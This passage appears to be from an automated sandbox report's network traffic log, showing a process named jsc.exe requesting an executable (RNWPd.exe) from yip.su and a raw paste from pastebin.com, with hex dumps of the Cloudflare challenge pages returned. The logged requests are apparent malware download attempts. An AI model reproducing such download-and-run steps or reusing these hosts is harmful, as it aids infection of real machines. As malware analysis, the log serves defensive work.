                                    2024-08-17 22:09:38 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 33 32 32 36 35 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 64 35 37 30 63 35 36 30 63 61 35 27 2c 63 48 61 73 68 3a 20 27 37 38 62 35 30 63 37 66 64 32 37 39 65 65 30 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 37 30 36 54 54 45 6c 52 61 66 6e 6a 71 37 6c 6e 67 67 49 41 4f 58 78 53 78 32 49 47 5f 37 56 53 45 6a 4c 41 48 77 69 47 4b 4a 34 2d 31 37 32 33 39 33 32 35 37 38 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '32265',cRay: '8b4cfd570c560ca5',cHash: '78b50c7fd279ee0',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=706TTElRafnjq7lnggIAOXxSx2IG_7VSEjLAHwiGKJ4-1723932578-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:09:38 UTC1369INData Raw: 48 62 37 56 32 64 50 69 4b 75 45 42 43 49 79 70 4d 30 67 72 51 32 39 56 32 42 6f 53 39 59 74 6c 37 53 34 6c 69 71 5f 4d 7a 37 30 44 55 54 4a 61 4d 43 55 4e 39 51 35 37 4c 4e 77 31 45 37 5a 36 39 6f 65 74 65 66 72 6f 2e 5a 6f 36 4d 6e 61 5a 52 76 35 75 48 55 71 56 52 36 6b 5f 39 32 30 61 38 71 4a 62 71 6c 6a 48 75 71 5f 68 30 67 4f 59 57 43 44 44 41 73 64 47 6d 63 51 68 39 70 44 6a 51 49 65 63 58 32 73 37 67 6e 32 35 75 5a 70 47 6c 4a 62 39 52 52 75 6c 65 43 6d 75 50 68 36 45 44 51 54 78 4a 32 6f 58 56 4f 5a 49 64 70 47 6c 43 54 70 4d 69 47 64 38 77 4f 6c 36 49 4e 56 34 66 47 41 5f 4a 58 49 4c 64 4d 76 75 54 37 31 63 38 73 74 56 6d 6b 65 47 4a 63 79 58 4c 34 46 4e 6c 44 45 56 72 53 32 6f 54 7a 4d 66 78 41 51 51 56 32 58 73 4a 79 6e 47 4d 52 75 79 75 67 4d
                                    Data Ascii: Hb7V2dPiKuEBCIypM0grQ29V2BoS9Ytl7S4liq_Mz70DUTJaMCUN9Q57LNw1E7Z69oetefro.Zo6MnaZRv5uHUqVR6k_920a8qJbqljHuq_h0gOYWCDDAsdGmcQh9pDjQIecX2s7gn25uZpGlJb9RRuleCmuPh6EDQTxJ2oXVOZIdpGlCTpMiGd8wOl6INV4fGA_JXILdMvuT71c8stVmkeGJcyXL4FNlDEVrS2oTzMfxAQQV2XsJynGMRuyugM


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    34192.168.2.549759188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:43 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:43 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:09:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:09:43 UTC685INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 67 70 74 67 44 45 35 53 49 46 41 64 4f 4e 6b 2b 36 75 4e 36 78 67 33 62 31 56 4e 31 75 50 41 6d 32 34 4a 63 4a 64 73 55 42 52 69 74 61 49 54 67 2f 2f 42 78 2b 51 35 51 4e 50 6a 74 74 47 41 32 5a 7a 35 37 45 49 2f 38 34 65 75 39 46 73 62 56 41 32 31 66 73 5a 50 76 50 4d 79 62 6e 47 58 54 7a 78 68 78 51 52 6a 59 77 74 59 3d 24 63 51 39 51 50 5a 4b 4b 64 37 4b 32 4f 75 77 44 63 39 62 45 37 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: gptgDE5SIFAdONk+6uN6xg3b1VN1uPAm24JcJdsUBRitaITg//Bx+Q5QNPjttGA2Zz57EI/84eu9FsbVA21fsZPvPMybnGXTzxhxQRjYwtY=$cQ9QPZKKd7K2OuwDc9bE7g==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:09:43 UTC1369INData Raw: 33 64 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3de7<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:09:43 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:09:43 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:09:43 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:09:43 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:09:43 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:09:43 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:09:43 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 39 32 36 32 36 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 64 37 38 31 63 30 30 30 66 35 62 27 2c 63 48 61 73 68 3a 20 27 35 39 36 37 38 30 63 39 61 30 39 32 61 37 65 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 48 6f 6f 74 78 37 4a 38 64 4e 56 79 31 49 73 70 44 4e 4f 52 6f 49 6f 71 65 4b 4e 5f 6d 67 59 70 39 6c 6b 4d 4b 4e 6e 54 4e 71 34 2d 31 37 32 33 39 33 32 35 38 33 2d 30 2e 30 2e 31 2e 31 2d 34 31 31 36 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '92626',cRay: '8b4cfd781c000f5b',cHash: '596780c9a092a7e',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=Hootx7J8dNVy1IspDNORoIoqeKN_mgYp9lkMKNnTNq4-1723932583-0.0.1.1-4116",cFPWv: 'g',cTTim
                                    2024-08-17 22:09:43 UTC1369INData Raw: 30 4c 55 51 54 33 75 77 73 75 6d 52 50 66 43 4e 56 2e 39 48 76 6f 52 78 44 38 33 63 46 7a 42 42 64 2e 59 78 58 75 46 70 6b 76 58 5a 5f 6e 31 55 4f 71 71 69 39 43 70 74 39 45 59 38 49 78 44 61 36 32 79 38 52 4a 64 73 68 52 73 56 30 41 33 33 4e 58 39 6f 47 73 62 6a 52 71 42 4d 6d 73 32 6e 66 58 42 63 62 51 35 47 70 5a 79 6e 6e 4c 7a 47 58 5f 6e 6c 6b 47 78 4b 68 64 36 4d 6d 41 4a 4b 54 47 55 56 45 6f 55 77 5f 76 51 5a 57 56 33 46 59 57 33 51 44 64 4d 44 41 41 58 6d 66 55 62 6c 64 37 4e 4d 63 68 56 6a 6d 39 6e 49 4a 74 2e 79 42 7a 6a 45 35 35 76 62 46 41 55 56 65 35 73 4e 77 4e 51 78 70 45 63 42 4b 37 39 36 2e 41 5a 59 46 34 4e 4e 36 6c 30 67 54 64 37 69 67 61 42 74 42 4e 62 52 6d 4b 7a 43 4c 4f 7a 79 61 4c 32 79 64 72 33 55 35 79 77 75 42 36 65 47 6d 43 33
                                    Data Ascii: 0LUQT3uwsumRPfCNV.9HvoRxD83cFzBBd.YxXuFpkvXZ_n1UOqqi9Cpt9EY8IxDa62y8RJdshRsV0A33NX9oGsbjRqBMms2nfXBcbQ5GpZynnLzGX_nlkGxKhd6MmAJKTGUVEoUw_vQZWV3FYW3QDdMDAAXmfUbld7NMchVjm9nIJt.yBzjE55vbFAUVe5sNwNQxpEcBK796.AZYF4NN6l0gTd7igaBtBNbRmKzCLOzyaL2ydr3U5ywuB6eGmC3


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    35192.168.2.549760104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:48 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:48 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:09:48 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfd96c8ff42d7-EWR
                                    2024-08-17 22:09:48 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:09:48 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:09:48 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:09:48 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:09:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    36192.168.2.549761188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:09:49 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:09:49 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:09:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
